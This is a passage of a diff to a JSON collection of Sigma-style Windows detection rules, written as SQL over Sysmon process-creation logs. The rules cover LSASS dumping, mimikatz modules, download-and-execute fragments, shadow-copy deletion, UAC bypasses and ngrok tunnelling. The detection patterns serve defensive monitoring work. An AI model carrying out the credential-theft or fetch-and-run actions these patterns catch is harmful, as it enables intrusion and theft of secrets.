'\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" + "filename": "proc_creation_win_ping_hex_ip.yml" }, { - "title": "Potential Snatch Ransomware Activity", - "id": "5325945e-f1f0-406e-97b8-65104d393fff", - "status": "stable", - "description": "Detects specific process characteristics of Snatch ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "title": "MMC Spawning Windows Shell", + "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "status": "test", + "description": "Detects a Windows command line executable started from MMC", + "author": "Karneades, Swisscom CSIRT", "tags": [ - "attack.execution", - "attack.t1204" - ], - "falsepositives": [ - "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + "attack.lateral_movement", + "attack.t1021.003" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR Image LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_snatch_ransomware.yml" + "filename": "proc_creation_win_mmc_susp_child_process.yml" }, { "title": "UAC Bypass via Event Viewer", @@ -14147,9757 +13759,9596 @@ "filename": "proc_creation_win_uac_bypass_eventvwr.yml" }, { - "title": "Suspicious Add User to Remote Desktop Users Group", - "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", - "status": "experimental", - "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "title": "Potential LSASS Process Dump Via Procdump", + "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "status": "stable", + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1133", - "attack.t1136.001", - "attack.t1021.001" + "attack.defense_evasion", + "attack.t1036", + "attack.credential_access", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Administrative activity" + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" + "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" }, { - "title": "Service Registry Key Deleted Via Reg.EXE", - "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", + "title": "HackTool - TruffleSnout Execution", + "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'TruffleSnout.exe' OR Image LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_delete_services.yml" + "filename": "proc_creation_win_hktl_trufflesnout.yml" }, { - "title": "Equation Group DLL_U Export Function Load", - "id": "d465d1d8-27a2-4cca-9621-a800f37cf72e", - "status": "stable", - "description": "Detects a specific export function name used by one of EquationGroup tools", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.g0020", - "attack.defense_evasion", - "attack.t1218.011" + "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", + "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "status": "experimental", + "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%-export dll\\_u%' ESCAPE '\\' OR (CommandLine LIKE '%,dll\\_u' ESCAPE '\\' OR CommandLine LIKE '% dll\\_u' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml" + "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - Process", - "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", - "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "title": "HackTool - SharpLdapWhoami Execution", + "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", + "status": "experimental", + "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Unknown" + "Programs that use the same command line flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" + "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" }, { - "title": "Potential Exploitation Attempt From Office Application", - "id": "868955d9-697e-45d4-a3da-360cefd7c216", + "title": "HackTool - SharpImpersonation Execution", + "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", "status": "experimental", - "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", - "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", + "description": "Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" + "filename": "proc_creation_win_hktl_sharp_impersonation.yml" }, { - "title": "Suspicious Calculator Usage", - "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", - "status": "test", - "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", - "author": "Florian Roth (Nextron Systems)", + "title": "Change Default File Association To Executable Via Assoc", + "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", + "status": "experimental", + "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence", + "attack.t1546.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (Image LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_calc.yml" + "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" }, { - "title": "Suspicious VBScript UN2452 Pattern", - "id": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", + "title": "HTML Help HH.EXE Suspicious Child Process", + "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", "status": "test", - "description": "Detects suspicious inline VBScript keywords as used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious child process of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.execution", + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%CreateObject%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\hh.exe' ESCAPE '\\' AND (Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_vbscript_pattern.yml" + "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" }, { - "title": "Delete Important Scheduled Task", - "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", + "title": "UAC Bypass Using IDiagnostic Profile", + "id": "4cbef972-f347-4170-b62a-8253f6168e6d", "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_schtasks_delete.yml" + "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Process Dumping Via Comsvcs.DLL", - "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "title": "Suspicious SYSTEM User Process Creation", + "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "status": "test", - "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", - "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1036", - "attack.t1003.001", - "car.2013-05-009" - ], + "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", + "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "falsepositives": [ - "Unlikely, because no one should dump the process memory in that way" + "Administrative activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (Image LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" + "filename": "proc_creation_win_susp_system_user_anomaly.yml" }, { - "title": "Execution Of Non-Existing File", - "id": "71158e3f-df67-472b-930e-7d287acaa3e1", - "status": "experimental", - "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Execution via Diskshadow.exe", + "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", + "status": "test", + "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", + "author": "Ivan Dyachkov, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT (Image LIKE '%\\\\%' ESCAPE '\\') AND NOT ((Image = '') OR (Image IN ('-', '')) OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_image_missing.yml" + "filename": "proc_creation_win_lolbin_diskshadow.yml" }, { - "title": "HH.EXE Execution", - "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", + "title": "PUA - Ngrok Execution", + "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "status": "test", - "description": "Detects the usage of \"hh.exe\" executing recently modified .chm files.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.001" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unlikely" + "Another tool that uses the command line switches of Ngrok", + "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\hh.exe' ESCAPE '\\' AND CommandLine LIKE '%.chm%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (Image LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_chm_execution.yml" + "filename": "proc_creation_win_pua_ngrok.yml" }, { - "title": "Non-privileged Usage of Reg or Powershell", - "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "title": "Suspicious Control Panel DLL Load", + "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", "status": "test", - "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", - "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", + "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine 